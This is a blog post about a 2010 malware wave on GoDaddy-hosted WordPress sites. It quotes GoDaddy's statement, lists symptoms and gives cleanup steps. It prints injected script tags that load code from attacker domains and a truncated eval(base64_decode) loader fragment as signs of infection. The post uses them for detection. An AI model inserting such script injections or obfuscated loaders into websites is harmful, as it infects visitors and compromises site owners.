Majority of WordPress blogs hosted on GoDaddy were infected with some kind of malware for the past few days. Just now confirmed this news with some sources.
GoDaddy released this statement on 09-18-2010 at 2:43pm CST,
An exploit affected PHP files on approximately 150 Go Daddy accounts Friday afternoon. Go Daddy’s Security Team worked quickly to clean and restore these websites, however, we have detected additional customer sites that may currently be experiencing difficulties due to this same attack.
Go Daddy’s Security Team has identified the cause. Our forensics have determined malicious files are being uploaded via FTP to customer websites. Go Daddy is asking all customers who believe they have a problem to change their FTP passwords.
Meantime, our team is working swiftly to restore all affected websites and appreciates customer feedback. Go Daddy will continue to monitor as long as it takes to ensure our customer accounts are clean.
If you suspect your site was impacted, please fill out our security submission form, located here – https://www.godaddy.com/community/contactus.aspx?ci=15534§ion=support.
Go Daddy Chief Information Security Officer
Common Symptoms Of This Malware
- If you visit the infected website/blog, it redirects you to websites like , http://www4.megaav-soft74.co.cc, etc.
- The .php files located on the server have the same “last modified” date and approximately the same time.
<script src="http://myblindstudioinfoonline.com/ll.php"> </script>
<script src="http://theblindstudioinfoonline.com/ll.php"> </script>
If Your Blog Is Infected By This Malware
You really need to calm down (like I did :D) and just follow the below mentioned basic steps.
- Just stay calm and run a virus scan on your computer to make sure it is not infected.
- Use a maintenance plugin and make your site inaccessible so that your visitors won’t be infected with this malware.
- Change the password for FTP and WordPress.
- Try this simple solution to remove all the malware.
- Remove the “eval(base64_decode(“aWYoZnVuY3Rpb….” codes from your theme files.
P.S. It is recommended to use the latest version of browsers.
Google’s Safe Browsing Report
According to Google’s Safe Browsing report,
If you are facing serious issues, then contact GoDaddy or Security service like Sucuri.